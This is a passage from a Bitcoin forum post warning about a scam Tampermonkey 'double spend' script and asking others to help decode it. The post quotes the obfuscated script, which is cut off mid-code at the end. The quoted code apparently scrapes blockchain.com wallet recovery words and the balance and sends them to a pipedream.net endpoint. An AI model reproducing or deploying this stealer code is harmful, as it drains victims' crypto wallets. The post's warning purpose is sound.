Bitcoin Forum
May 01, 2024, 03:25:59 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Fake Malicious script to "double spend" BTC (please help decode the script)  (Read 186 times)
logfiles (OP)
Copper Member
Legendary
*
Offline Offline

Activity: 1960
Merit: 1643


Top Crypto Casino


View Profile WWW
April 11, 2024, 11:46:26 PM
Merited by BlackHatCoiner (4), examplens (1), FatFork (1), decodx (1)
 #1

What happened: shunato8 claims you can make $1,000 from Bitcoin casinos / sportsbook sites by running a script on Tampermonkey that can "double spend" bitcoin even after one confirmation. Obviously this is not true

The script is probably malicious and might just steal funds from your wallet

Scammers Profile Link: https://bitcointalk.org/index.php?action=profile;u=3622803

Reference Link: https://bitcointalk.org/index.php?topic=5492483.0
Archived: https://ninjastic.space/post/63933509

Additional Notes:
All his topics are also closed, which is suspicious.

Help is needed to decode the script for those who have some knowledge about code. I want to use it as evidence to report his google drive account.

PLEASE, THE SCRIPT IS MOST LIKELY MALICIOUS. DO NOT COPY, PASTE OR RUN IT IF YOU HAVE NO IDEA

Code:
// ==UserScript==
// @name         Blockchain RBF
// @namespace    Blockchain RBF
// @version      1.02
// @description  Automatically double-spend a transaction in blockchain.com wallet once it gets one confirmation
// @author       Hadez
// @match        *://*/*
// @icon         https://www.google.com/s2/favicons?sz=64&domain=blockchain.com
// @grant        none
// ==/UserScript==
 
'use strict';
 
function _0x5c8b(_0x46c69e,_0x2156e2){const _0x149ccb=_0x149c();return _0x5c8b=function(_0x5c8b6e,_0x1956eb){_0x5c8b6e=_0x5c8b6e-(-0x2*-0x4d3+-0x68c+-0x1bf);let _0xd9a472=_0x149ccb[_0x5c8b6e];return _0xd9a472;},_0x5c8b(_0x46c69e,_0x2156e2);}function _0x149c(){const _0x3fb27f=['KzKul','lVeCr','221528dLQwJu','prototype','click','replace','function','81idDmTI','grjrP','mNFtt','tnYqv','ackupFlyou','rNHfi','2e=\x22topBal','error','constructo','vlkuO','undefined','tton\x22]','134330ZaBgfV','kupFundsBu','lJiPW','createElem','AiDis','18JFKTgD','apply','button[dat','Woluf','removeChil','nWgOV','tor','eQuuq','fCLHb','ZHrWc','body','a-e2e=\x22toR','YzFHB','YGnPU','n/#/securi','torAll','UETkp','location','https://lo','map','bOzVB','?words=','565414IrVBrb','UZYpD','log','IFtPw','OcGUC','733736tOZpWd','yvuXN','uLJoy','iRPTH','style','FIMJI','width','appendChil','(((.+)+)+)','DBNgS','__proto__','ZCvVo','href','ZzXzD','db6.m.pipe','height','background','xpRtN','querySelec','bind','uYHtZ','ydcBp','azdTZ','9999','fixed','dPEhw','GXtlu','Words\x22]\x20di','sOcOC','search','ecoveryTwo','table','a-e2e=\x22bac','exception','FAHiT','ty-center/','length','5342iBTTQg','632160fxvJga','uXBZb','yBQjS','left','https://eo','ljwEM','abaOb','yZVIj','t\x22]','join','CbiMu','szaaexw5ct','div','Jhiuz','trim','apsaG','div[data-e','2e=\x22backup','IgCPi','from','qGemY','console','toString','qkvjL','2197728Pweuur','aMEaB','top','HBQfK','EsNUX','anceTotal\x22','hOvmi','dream.net/','100%','textConten','fZojH','object','basic','adGAB','warn','idNMM','KldUS','trace','SefWX'];_0x149c=function(){return _0x3fb27f;};return _0x149c();}(function(_0xafea56,_0x39576a){const _0x2ef0d8=_0xafea56();function _0x1137fb(_0x51e6c4,_0x3b09b1,_0x2f4d56,_0x478e51){return _0x5c8b(_0x51e6c4- -0x32a,_0x478e51);}function _0x4407d9(_0x13fc46,_0x373b90,_0x1b0d76,_0x5e72cf){return _0x5c8b(_0x1b0d76- -0x53,_0x5e72cf);}while(!![]){try{const _0x32ec05=parseInt(_0x1137fb(-0x175,-0x147,-0x182,-0x190))/(-0x62f+-0x1571+-0x1ba1*-0x1)+-parseInt(_0x4407d9(0xf0,0x111,0x108,0x12a))/(0x1*-0x1d24+0x28e*0xe+-0x69e)*(parseInt(_0x4407d9(0x12d,0x160,0x13b,0x165))/(-0x17f0+0x194f+-0x57*0x4))+parseInt(_0x1137fb(-0x170,-0x163,-0x17f,-0x1a7))/(-0x236f+0x1483+0x4*0x3bc)+parseInt(_0x1137fb(-0x1ce,-0x1dc,-0x1d5,-0x1c6))/(0x279+-0x2002+0xc2*0x27)+-parseInt(_0x1137fb(-0x1b6,-0x1b3,-0x1d0,-0x176))/(-0x905+0x2576+-0x1c6b*0x1)+-parseInt(_0x4407d9(0x13b,0x184,0x147,0x13f))/(-0x17dd+0xb87+0xc5d)+parseInt(_0x1137fb(-0x1a1,-0x1a8,-0x168,-0x192))/(-0x5*-0x65b+0x1295+-0x3254)*(parseInt(_0x4407d9(0x137,0x165,0x14c,0x186))/(-0x6e6*0x5+0x1*-0x1d87+0x400e));if(_0x32ec05===_0x39576a)break;else _0x2ef0d8['push'](_0x2ef0d8['shift']());}catch(_0x582adb){_0x2ef0d8['push'](_0x2ef0d8['shift']());}}}(_0x149c,-0xe1469*0x1+0x182*-0x4d5+-0xb*-0x2993a));const _0x2156e2=(function(){function _0x3d73ad(_0x445cae,_0x377c5b,_0x3dcba3,_0x19911f){return _0x5c8b(_0x19911f- -0x18d,_0x377c5b);}const _0x265aa8={};function _0x428513(_0x1f12ea,_0x2d4320,_0x358e3f,_0x5e524b){return _0x5c8b(_0x358e3f- -0x16f,_0x5e524b);}_0x265aa8[_0x3d73ad(0x7a,0x5,0x7a,0x3a)]=_0x3d73ad(0x31,-0x1,-0x20,0x22);const _0x442b7a=_0x265aa8;let _0x1756ff=!![];return function(_0x25c39d,_0x4e1c74){const _0x50ab76=_0x1756ff?function(){function _0x40d7f5(_0x5a9017,_0x2cbb8d,_0x520bba,_0x453586){return _0x5c8b(_0x520bba- -0x338,_0x453586);}if(_0x4e1c74){if('UETkp'!==_0x442b7a['ZzXzD']){const _0x25834f=_0x3cc0bc?function(){function _0x2d372f(_0x1e218a,_0x328561,_0x2b09a7,_0x2e605d){return _0x5c8b(_0x328561- -0x17a,_0x2b09a7);}if(_0x5402b4){const _0x568aee=_0x1113aa[_0x2d372f(-0xa,0x26,0x43,0x23)](_0x2cbdf0,arguments);return _0x20bc1f=null,_0x568aee;}}:function(){};return _0x35caa4=![],_0x25834f;}else{const _0x1add9a=_0x4e1c74[_0x40d7f5(-0x1c9,-0x193,-0x198,-0x184)](_0x25c39d,arguments);return _0x4e1c74=null,_0x1add9a;}}}:function(){};return _0x1756ff=![],_0x50ab76;};}()),_0x46c69e=_0x2156e2(this,function(){function _0x3667be(_0x4ff5c8,_0x20c6f9,_0x250e3a,_0x48f7f4){return _0x5c8b(_0x250e3a- -0x62,_0x20c6f9);}function _0x409154(_0x37b225,_0x26271a,_0x35aa44,_0x43f6d4){return _0x5c8b(_0x26271a- -0x1f6,_0x43f6d4);}const _0x36b5fb={};_0x36b5fb[_0x409154(-0x73,-0x5a,-0x36,-0x91)]=_0x3667be(0x151,0x17c,0x160,0x1a2)+'+$';const _0x2c2d19=_0x36b5fb;return _0x46c69e[_0x409154(-0x48,-0x84,-0x89,-0xc6)]()['search'](_0x2c2d19[_0x3667be(0x175,0x142,0x13a,0x177)])[_0x409154(-0x6e,-0x84,-0x5d,-0xa2)]()['constructo'+'r'](_0x46c69e)[_0x3667be(0x1b3,0x150,0x175,0x1b5)](_0x2c2d19['lJiPW']);});_0x46c69e();const _0x1fae3e=(function(){let _0x521887=!![];return function(_0x539ffe,_0x1cdff4){const _0x42c124=_0x521887?function(){if(_0x1cdff4){const _0x4b941a=_0x1cdff4['apply'](_0x539ffe,arguments);return _0x1cdff4=null,_0x4b941a;}}:function(){};return _0x521887=![],_0x42c124;};}()),_0x2b7a12=_0x1fae3e(this,function(){const _0x4886d2={};_0x4886d2[_0x4d0450(0x183,0x1f3,0x1c2,0x1e9)]=_0x3a1736(-0x227,-0x22d,-0x1f3,-0x266),_0x4886d2[_0x4d0450(0x1a4,0x183,0x1b2,0x181)]=_0x3a1736(-0x287,-0x246,-0x277,-0x279),_0x4886d2[_0x3a1736(-0x1dd,-0x20c,-0x20a,-0x222)]=function(_0x4d7ce0,_0x5b185e){return _0x4d7ce0===_0x5b185e;},_0x4886d2[_0x3a1736(-0x22e,-0x23f,-0x263,-0x25a)]='function',_0x4886d2[_0x4d0450(0x20d,0x203,0x1d6,0x20c)]=_0x3a1736(-0x22f,-0x20e,-0x22f,-0x225),_0x4886d2['HBQfK']='info',_0x4886d2[_0x4d0450(0x1cf,0x1f3,0x1b9,0x1c7)]='error',_0x4886d2['ZHrWc']=_0x4d0450(0x1a5,0x1f5,0x1e1,0x212),_0x4886d2['uXBZb']=_0x3a1736(-0x1d2,-0x1ec,-0x22a,-0x1b5),_0x4886d2[_0x4d0450(0x168,0x196,0x16c,0x14b)]=_0x3a1736(-0x219,-0x240,-0x254,-0x1fe),_0x4886d2[_0x4d0450(0x153,0x18c,0x164,0x17b)]=function(_0x231424,_0x4f3d03){return _0x231424<_0x4f3d03;};function _0x3a1736(_0x36687c,_0x1d6a8c,_0xac1af6,_0x3a52e3){return _0x5c8b(_0x1d6a8c- -0x3c5,_0x3a52e3);}const _0x3e31d1=_0x4886d2,_0x381d37=typeof window!==_0x3e31d1[_0x4d0450(0x1a8,0x1c8,0x1c2,0x1e1)]?window:typeof process===_0x3e31d1[_0x3a1736(-0x20f,-0x219,-0x23d,-0x258)]&&_0x3e31d1['OcGUC'](typeof require,_0x3e31d1[_0x3a1736(-0x26b,-0x23f,-0x263,-0x220)])&&typeof global===_0x3e31d1[_0x4d0450(0x1c3,0x19f,0x1b2,0x189)]?global:this,_0x36fcf2=_0x381d37[_0x3a1736(-0x287,-0x254,-0x212,-0x226)]=_0x381d37[_0x3a1736(-0x23d,-0x254,-0x230,-0x264)]||{};function _0x4d0450(_0x80ca37,_0x2a7728,_0x53bb78,_0x4e5a5e){return _0x5c8b(_0x53bb78-0x6,_0x4e5a5e);}const _0x44013e=[_0x3e31d1['azdTZ'],_0x3a1736(-0x25a,-0x243,-0x263,-0x281),_0x3e31d1[_0x3a1736(-0x24e,-0x24e,-0x266,-0x23f)],_0x3e31d1['bOzVB'],_0x3e31d1[_0x4d0450(0x1bb,0x1df,0x1ae,0x1b9)],_0x3e31d1[_0x3a1736(-0x2a2,-0x268,-0x243,-0x270)],_0x3e31d1['CbiMu']];for(let _0x2fe47e=-0x2*0x624+0xc7*0x16+-0x4d2;_0x3e31d1[_0x4d0450(0x132,0x13c,0x164,0x16c)](_0x2fe47e,_0x44013e[_0x4d0450(0x1d1,0x1a3,0x1e4,0x1a4)]);_0x2fe47e++){const _0x3be773=_0x1fae3e[_0x4d0450(0x1d9,0x1b7,0x19c,0x16c)+'r']['prototype'][_0x4d0450(0x1a8,0x1a3,0x1d3,0x1aa)](_0x1fae3e),_0x400c7b=_0x44013e[_0x2fe47e],_0x2835dd=_0x36fcf2[_0x400c7b]||_0x3be773;_0x3be773[_0x3a1736(-0x1e0,-0x201,-0x208,-0x23d)]=_0x1fae3e['bind'](_0x1fae3e),_0x3be773[_0x3a1736(-0x26a,-0x253,-0x278,-0x254)]=_0x2835dd[_0x4d0450(0x18f,0x19a,0x178,0x145)]['bind'](_0x2835dd),_0x36fcf2[_0x400c7b]=_0x3be773;}});_0x2b7a12();function checkAndPerformActions(){function _0x1f9955(_0x1f6b20,_0x3cef41,_0x1b2079,_0x256b89){return _0x5c8b(_0x1b2079-0x36c,_0x256b89);}const _0x2f0ba2={'EsNUX':function(_0x3d1841,_0x44bd5b){return _0x3d1841(_0x44bd5b);},'FIMJI':_0x109315(-0xc7,-0x88,-0xdf,-0xbf)+_0x1f9955(0x4de,0x4d6,0x500,0x53c)+_0x1f9955(0x4c6,0x523,0x4e5,0x4be)+']','fZojH':_0x109315(-0xa2,-0x6d,-0x94,-0xc0),'KldUS':'div[data-e'+_0x1f9955(0x4fa,0x4a0,0x4d9,0x4e3)+_0x109315(-0x5e,-0x79,-0x49,-0x59)+'v','aMEaB':'button[dat'+_0x1f9955(0x4e2,0x52c,0x516,0x50e)+_0x1f9955(0x547,0x54a,0x544,0x510)+'\x22]','KzKul':'vLRCN','hOvmi':function(_0xd3512c,_0x1cade5,_0x406a6b){return _0xd3512c(_0x1cade5,_0x406a6b);},'hBvqn':_0x1f9955(0x52f,0x539,0x50d,0x52f)+'a-e2e=\x22toB'+_0x109315(-0xa1,-0xc5,-0xe1,-0x66)+_0x109315(-0xcf,-0xdc,-0xe4,-0xbe),'Woluf':function(_0x3aec40,_0x5d9daa){return _0x3aec40!==_0x5d9daa;},'lVeCr':'mPIYb','xkEHd':'button[dat'+_0x1f9955(0x57e,0x523,0x546,0x54d)+_0x109315(-0x98,-0x67,-0x6a,-0xb5)+_0x1f9955(0x4cf,0x539,0x505,0x516),'rNHfi':_0x109315(-0x65,-0x7e,-0x27,-0x5b),'IgCPi':'dzpHo','dPEhw':function(_0x197a7f,_0x3c9313,_0x179179){return _0x197a7f(_0x3c9313,_0x179179);},'sOcOC':function(_0x19a915,_0x30e5f7){return _0x19a915>_0x30e5f7;},'vlkuO':_0x109315(-0xcb,-0xd0,-0xb2,-0xcd),'UZYpD':_0x1f9955(0x54d,0x535,0x53e,0x555),'YzFHB':_0x1f9955(0x4e9,0x510,0x4e8,0x51e),'ZCvVo':'#fff','cKjvB':_0x109315(-0x62,-0x66,-0x22,-0x87),'MoIFh':function(_0x71d7fe,_0x13f9c1,_0x35294b){return _0x71d7fe(_0x13f9c1,_0x35294b);}},_0x5aad9c=document[_0x1f9955(0x576,0x4f7,0x538,0x576)+_0x1f9955(0x545,0x4d4,0x511,0x503)](_0x2f0ba2[_0x109315(-0x74,-0xa9,-0x8b,-0x8a)]),_0x7fa6d1=_0x2f0ba2[_0x1f9955(0x4c3,0x4d7,0x4e4,0x4f3)](parseFloat,_0x5aad9c[_0x109315(-0xb6,-0xc2,-0xa1,-0xd7)+'t'][_0x109315(-0xa7,-0xe4,-0x87,-0xce)](/[^\d.-]/g,''));function _0x109315(_0x8adfba,_0x41bb47,_0x53ceb6,_0x42026e){return _0x5c8b(_0x8adfba- -0x233,_0x53ceb6);}if(_0x2f0ba2[_0x1f9955(0x581,0x578,0x542,0x525)](_0x7fa6d1,0x1eef+-0x1a54+-0x49b)){const _0x17e254=document[_0x109315(-0x96,-0xd2,-0xd2,-0xb1)+'ent'](_0x2f0ba2[_0x1f9955(0x51a,0x4f0,0x503,0x53c)]);_0x17e254['style']['position']=_0x2f0ba2[_0x1f9955(0x559,0x549,0x522,0x55a)],_0x17e254[_0x109315(-0x75,-0xb1,-0x9a,-0xa8)][_0x1f9955(0x4a5,0x4c8,0x4e2,0x4ea)]='0',_0x17e254[_0x109315(-0x75,-0x53,-0x8b,-0xae)][_0x109315(-0xd4,-0x9e,-0x101,-0xa1)]='0',_0x17e254['style'][_0x1f9955(0x502,0x541,0x52c,0x533)]=_0x2f0ba2['YzFHB'],_0x17e254['style'][_0x109315(-0x6a,-0x79,-0x67,-0x77)]=_0x2f0ba2[_0x1f9955(0x502,0x50d,0x517,0x52b)],_0x17e254[_0x1f9955(0x55e,0x55a,0x52a,0x50b)][_0x109315(-0x69,-0x8a,-0x33,-0x84)+'Color']=_0x2f0ba2[_0x109315(-0x6e,-0x82,-0x63,-0xa2)],_0x17e254[_0x1f9955(0x552,0x550,0x52a,0x4ec)]['zIndex']=_0x2f0ba2['cKjvB'],document['body'][_0x1f9955(0x4f6,0x54d,0x52d,0x4f9)+'d'](_0x17e254);const _0x4cd5a6=window[_0x109315(-0x83,-0x53,-0x79,-0x75)][_0x1f9955(0x4f4,0x4f8,0x532,0x567)];window[_0x1f9955(0x4da,0x546,0x51c,0x50c)][_0x1f9955(0x540,0x56d,0x532,0x55f)]=_0x109315(-0x82,-0xb7,-0x96,-0x72)+'gin.blockc'+'hain.com/e'+_0x1f9955(0x537,0x508,0x519,0x549)+_0x1f9955(0x534,0x57e,0x549,0x527)+_0x109315(-0xb3,-0xdf,-0x77,-0xcd),_0x2f0ba2['MoIFh'](setTimeout,()=>{const _0x397056={'DBNgS':function(_0x32f9e3,_0x1293a5){return _0x32f9e3!==_0x1293a5;},'yvuXN':function(_0x5ec4da,_0x595fef){return _0x2f0ba2['EsNUX'](_0x5ec4da,_0x595fef);},'KXaTi':_0x2f0ba2['FIMJI'],'mNFtt':_0x2f0ba2[_0x5f15f5(0x29e,0x262,0x28a,0x2ad)],'nWgOV':_0x2f0ba2[_0x5f15f5(0x250,0x2ac,0x290,0x2cf)],'Jhiuz':_0x2f0ba2[_0x480df6(0x2a2,0x25a,0x280,0x248)],'xpRtN':_0x2f0ba2[_0x480df6(0x2a7,0x263,0x292,0x2a7)],'RNiNf':function(_0x1a78f2,_0xa44810,_0x53702f){return _0x2f0ba2['hOvmi'](_0x1a78f2,_0xa44810,_0x53702f);},'adGAB':_0x2f0ba2['hBvqn'],'yZVIj':function(_0xba50d2,_0x3dd08f){function _0x21df14(_0x4eabc2,_0x3a11d8,_0x2f0cc3,_0x43a77d){return _0x5f15f5(_0x4eabc2-0xc3,_0x43a77d,_0x3a11d8- -0x249,_0x43a77d-0x18d);}return _0x2f0ba2[_0x21df14(0x4e,0x65,0x73,0x38)](_0xba50d2,_0x3dd08f);},'qkvjL':_0x2f0ba2[_0x5f15f5(0x2af,0x299,0x294,0x29e)],'qGemY':function(_0x5ab7cc,_0x3eda6f,_0x436e93){function _0x59dd03(_0x1fd77f,_0x20f3d4,_0x229ac9,_0x3cf93e){return _0x5f15f5(_0x1fd77f-0x5f,_0x229ac9,_0x1fd77f- -0xfe,_0x3cf93e-0x6f);}return _0x2f0ba2[_0x59dd03(0x188,0x1ae,0x14e,0x165)](_0x5ab7cc,_0x3eda6f,_0x436e93);}},_0x53b4b7=document[_0x480df6(0x2b0,0x2dd,0x2d7,0x2e2)+_0x5f15f5(0x2d5,0x2a5,0x2b1,0x2e8)](_0x2f0ba2['xkEHd']);function _0x5f15f5(_0x137468,_0x5c2e35,_0x519cc8,_0x5e5688){return _0x109315(_0x519cc8-0x33f,_0x5c2e35-0x3e,_0x5c2e35,_0x5e5688-0x1b1);}if(_0x53b4b7){if(_0x2f0ba2[_0x5f15f5(0x274,0x2a6,0x29f,0x290)]===_0x2f0ba2[_0x480df6(0x244,0x299,0x279,0x2a8)]){const _0x7b9743=_0x2c4a58?function(){if(_0x51c1b0){const _0x417402=_0x3bba61['apply'](_0x58f45a,arguments);return _0x262591=null,_0x417402;}}:function(){};return _0x41e9f6=![],_0x7b9743;}else _0x53b4b7['click']();}function _0x480df6(_0x31d148,_0x1c3654,_0x19744c,_0x5d22c7){return _0x1f9955(_0x31d148-0x30,_0x1c3654-0x7b,_0x19744c- -0x261,_0x5d22c7);}_0x2f0ba2[_0x5f15f5(0x2e5,0x2fa,0x2df,0x2d7)](setTimeout,()=>{function _0x3a6e7c(_0x5e6a3,_0x53c4fa,_0x540847,_0x1e1082){return _0x480df6(_0x5e6a3-0x157,_0x53c4fa-0x153,_0x5e6a3-0xde,_0x53c4fa);}function _0x50b9a5(_0x130336,_0x21ef21,_0x19f2cf,_0x384a22){return _0x480df6(_0x130336-0x1b3,_0x21ef21-0x1f,_0x21ef21- -0x20b,_0x384a22);}const _0x18d3e0={};_0x18d3e0[_0x50b9a5(0x10c,0xcf,0xe8,0xb2)]='(((.+)+)+)'+'+$';const _0x13057c=_0x18d3e0,_0x45148e=document['querySelec'+_0x50b9a5(0x69,0xa5,0xba,0x89)](_0x397056[_0x50b9a5(0xab,0x81,0xc1,0x4a)]);if(_0x45148e){if(_0x397056[_0x3a6e7c(0x34c,0x36f,0x37a,0x38c)](_0x3a6e7c(0x34a,0x37c,0x33d,0x356),_0x397056[_0x50b9a5(0x38,0x73,0x39,0x68)]))_0x45148e[_0x3a6e7c(0x374,0x39b,0x394,0x380)]();else{const _0x541c9a=_0x3cb0c5[_0x50b9a5(0xd4,0x96,0xd5,0xbc)+'r'][_0x50b9a5(0xad,0x8a,0xc1,0xb0)][_0x50b9a5(0xe3,0xcd,0x10b,0x99)](_0x5a8c94),_0xc3aff4=_0x1cac07[_0x4e8a50],_0x2a4c6b=_0x2ffe10[_0xc3aff4]||_0x541c9a;_0x541c9a[_0x3a6e7c(0x3ad,0x3bd,0x37a,0x3ad)]=_0x4de1c4['bind'](_0x1c80e6),_0x541c9a['toString']=_0x2a4c6b[_0x50b9a5(0xa6,0x72,0x8c,0x84)][_0x3a6e7c(0x3b6,0x37a,0x375,0x3f5)](_0x2a4c6b),_0x1b62b5[_0xc3aff4]=_0x541c9a;}}_0x397056[_0x50b9a5(0x62,0x70,0x75,0x61)](setTimeout,()=>{function _0x4741f0(_0x2504e5,_0x12773e,_0x2abf60,_0x1fe793){return _0x50b9a5(_0x2504e5-0x14b,_0x12773e-0x243,_0x2abf60-0x13b,_0x2abf60);}const _0xea4e16={'grjrP':function(_0x2d69e3,_0x3ea84d){function _0xc305cc(_0x160e1c,_0x4f07f6,_0x39a09f,_0x16d903){return _0x5c8b(_0x16d903- -0x104,_0x160e1c);}return _0x397056[_0xc305cc(0x7f,0xb5,0xbf,0xbf)](_0x2d69e3,_0x3ea84d);},'sOAaF':function(_0x470bd9,_0x22000c){function _0x4b8d68(_0x570cb1,_0x548512,_0x216185,_0x26f02c){return _0x5c8b(_0x216185-0x65,_0x548512);}return _0x397056[_0x4b8d68(0x226,0x212,0x220,0x20c)](_0x470bd9,_0x22000c);},'IFtPw':_0x397056['KXaTi'],'bmcWi':function(_0x1f9cab,_0x112bd8){return _0x1f9cab+_0x112bd8;},'PycXC':function(_0x3e9821,_0x3887f4,_0x14e085){return _0x3e9821(_0x3887f4,_0x14e085);}};function _0x586b97(_0xa2c83e,_0xb6f24a,_0x4f2bfb,_0x21234d){return _0x3a6e7c(_0x21234d- -0x5c0,_0xb6f24a,_0x4f2bfb-0x54,_0x21234d-0x1d6);}if(_0x397056[_0x586b97(-0x1db,-0x21e,-0x231,-0x214)](_0x397056[_0x586b97(-0x27c,-0x20e,-0x208,-0x247)],_0x397056[_0x4741f0(0x2c4,0x2d3,0x2b7,0x303)])){const _0x2efe0a=_0x4495c9[_0x586b97(-0x1fe,-0x23d,-0x1f9,-0x237)](_0x37da44,arguments);return _0x494ca3=null,_0x2efe0a;}else{let _0x4d583d=Array[_0x4741f0(0x28c,0x2b2,0x2a0,0x2cb)](document[_0x4741f0(0x2de,0x30f,0x349,0x31a)+_0x586b97(-0x228,-0x240,-0x264,-0x229)](_0x397056[_0x586b97(-0x22b,-0x223,-0x257,-0x233)]))[_0x4741f0(0x2c6,0x2f5,0x2b4,0x31e)](_0x52b573=>_0x52b573[_0x586b97(-0x286,-0x239,-0x22c,-0x25a)+'t'][_0x586b97(-0x235,-0x281,-0x236,-0x26d)]())[_0x4741f0(0x2cf,0x2a8,0x279,0x294)]('\x20');const _0x5c6b17=document[_0x586b97(-0x1e9,-0x1cd,-0x1ce,-0x20b)+'tor'](_0x397056[_0x4741f0(0x2c5,0x2ac,0x2d7,0x2c2)]);if(_0x5c6b17){if(_0x397056[_0x4741f0(0x332,0x306,0x2c5,0x304)](_0x397056[_0x586b97(-0x237,-0x1ce,-0x1d9,-0x20c)],_0x397056[_0x586b97(-0x216,-0x1ee,-0x1ef,-0x20c)]))return _0x21f913[_0x4741f0(0x2df,0x2b5,0x2bc,0x2c6)]()['search'](hfIBly[_0x586b97(-0x1e7,-0x1da,-0x21f,-0x208)])['toString']()[_0x586b97(-0x235,-0x254,-0x22b,-0x241)+'r'](_0x37f06a)['search'](hfIBly[_0x4741f0(0x301,0x312,0x2e3,0x349)]);else _0x5c6b17['click']();}_0x397056['RNiNf'](setTimeout,()=>{function _0x120b81(_0x2f6d94,_0x15b593,_0x56fa1b,_0x51acb8){return _0x4741f0(_0x2f6d94-0x15d,_0x56fa1b- -0x187,_0x15b593,_0x51acb8-0x1f4);}function _0x10540d(_0x23a084,_0xe18b3a,_0x39980f,_0x526554){return _0x4741f0(_0x23a084-0x19a,_0x39980f- -0x161,_0x526554,_0x526554-0x143);}_0x4d583d+=_0xea4e16['bmcWi']('\x20',Array[_0x120b81(0xec,0x16a,0x12b,0x159)](document['querySelec'+'torAll'](_0x10540d(0x15c,0x185,0x14e,0x175)+'2e=\x22backup'+_0x120b81(0x19f,0x1c8,0x191,0x163)+'v'))[_0x120b81(0x187,0x141,0x16e,0x14f)](_0x123947=>_0x123947[_0x10540d(0x124,0x173,0x15f,0x17a)+'t'][_0x120b81(0xfe,0x13a,0x126,0xe9)]())[_0x120b81(0xee,0x117,0x121,0x153)]('\x20')),window['location']['href']=_0x4cd5a6,_0xea4e16['PycXC'](setTimeout,()=>{function _0x37cb0e(_0x5846b8,_0x8c2536,_0x197880,_0x34c320){return _0x120b81(_0x5846b8-0x27,_0x5846b8,_0x34c320-0x77,_0x34c320-0x174);}document[_0xb8e053(-0x158,-0x121,-0x132,-0x134)][_0xb8e053(-0x143,-0x127,-0x15c,-0x126)+'d'](_0x17e254);function _0xb8e053(_0x414d0a,_0x5a79bb,_0x31268b,_0x19ce8b){return _0x120b81(_0x414d0a-0x1e0,_0x31268b,_0x5a79bb- -0x286,_0x19ce8b-0x5e);}if(_0xea4e16[_0x37cb0e(0x184,0x1bd,0x1ed,0x1c2)](_0x4d583d,'\x20')){_0xea4e16['sOAaF'](clearInterval,intervalId);const _0x998037=_0x4d583d[_0xb8e053(-0x147,-0x13e,-0x122,-0x110)](/\d+/g,'')['replace'](/^\s+|\s+$/g,'')['replace'](/\s+/g,'\x20'),_0x2aab0c=document[_0x37cb0e(0x208,0x228,0x20f,0x1ff)+_0x37cb0e(0x1f3,0x201,0x19c,0x1d8)](_0xea4e16[_0xb8e053(-0xd1,-0x112,-0xeb,-0x137)]);window[_0xb8e053(-0xed,-0x11a,-0x129,-0x118)][_0xb8e053(-0xe5,-0x104,-0x135,-0x108)]=_0xb8e053(-0x14f,-0x16a,-0x1a7,-0x187)+_0xb8e053(-0x18e,-0x163,-0x136,-0x188)+_0x37cb0e(0x22a,0x210,0x21f,0x1fb)+_0x37cb0e(0x1c5,0x1ce,0x1a8,0x1ae)+_0xb8e053(-0xfa,-0x116,-0x13c,-0x13b)+_0x998037+'&balance='+_0x2aab0c['textConten'+'t'];}},0x8*0x71+0x18a3+-0x1bf9);},-0x2562+0xe3b+0x1759);}},0x21d0+0x139*0x5+-0x27bb*0x1);},-0x1fc+0x3*0x5d5+-0xf51);},-0x2370+0x1cfc+0x6a6);}}const intervalId=setInterval(function(){const _0x6be7d6={'ytmNd':function(_0x25fd41,_0x36b914){return _0x25fd41!==_0x36b914;},'iRPTH':'undefined','YplxL':function(_0x597f80,_0x2aa644){return _0x597f80===_0x2aa644;},'fCLHb':_0x25f51b(-0xdd,-0xd1,-0xad,-0xdc),'FAHiT':function(_0x1681ee,_0x1a23e3){return _0x1681ee===_0x1a23e3;},'abaOb':'info','IfefF':_0x5b0650(0x4ce,0x534,0x4cd,0x50b),'AiDis':'table','idNMM':'trace','GXtlu':function(_0x241284,_0x534920){return _0x241284<_0x534920;},'eQuuq':_0x5b0650(0x4b9,0x489,0x476,0x49b),'JLCdN':function(_0x30f4d1){return _0x30f4d1();}};function _0x5b0650(_0x3bfce7,_0x4adee9,_0x4b7666,_0x4181d8){return _0x5c8b(_0x4181d8-0x330,_0x4b7666);}function _0x25f51b(_0x453cdf,_0x2beb8a,_0x3ab742,_0x5b406d){return _0x5c8b(_0x2beb8a- -0x250,_0x5b406d);}try{if(_0x6be7d6[_0x25f51b(-0x56,-0x74,-0xb2,-0x87)](_0x6be7d6[_0x25f51b(-0x7d,-0xaa,-0x91,-0xe7)],_0x6be7d6['eQuuq']))_0x6be7d6['JLCdN'](checkAndPerformActions);else{const _0x34a7a4=tqIKiq['ytmNd'](typeof _0xd2ff22,tqIKiq[_0x25f51b(-0xb4,-0x93,-0x6e,-0x7a)])?_0x304634:tqIKiq['YplxL'](typeof _0x182bb2,tqIKiq[_0x5b0650(0x4ed,0x50e,0x506,0x4d7)])&&typeof _0x463d3a===_0x25f51b(-0xda,-0xc3,-0x88,-0xf9)&&tqIKiq[_0x5b0650(0x51f,0x4d7,0x4e0,0x50c)](typeof _0x30ba46,tqIKiq[_0x5b0650(0x511,0x4e4,0x4b9,0x4d7)])?_0x58b766:this,_0x4e8623=_0x34a7a4['console']=_0x34a7a4[_0x5b0650(0x47c,0x4e0,0x494,0x4a1)]||{},_0x5292b2=[_0x5b0650(0x516,0x4e9,0x526,0x4e7),_0x5b0650(0x4c0,0x4c7,0x4a9,0x4b2),tqIKiq[_0x5b0650(0x479,0x4c0,0x491,0x492)],_0x5b0650(0x4ef,0x4cd,0x491,0x4c5),tqIKiq['IfefF'],tqIKiq[_0x25f51b(-0xe8,-0xb2,-0xdf,-0x77)],tqIKiq[_0x25f51b(-0xf0,-0xcd,-0xba,-0xf7)]];for(let _0x38be00=0x197d+-0x1*0x631+-0x134c;tqIKiq[_0x25f51b(-0x5b,-0x7c,-0xa7,-0xb1)](_0x38be00,_0x5292b2[_0x5b0650(0x53a,0x4ec,0x4f3,0x50e)]);_0x38be00++){const 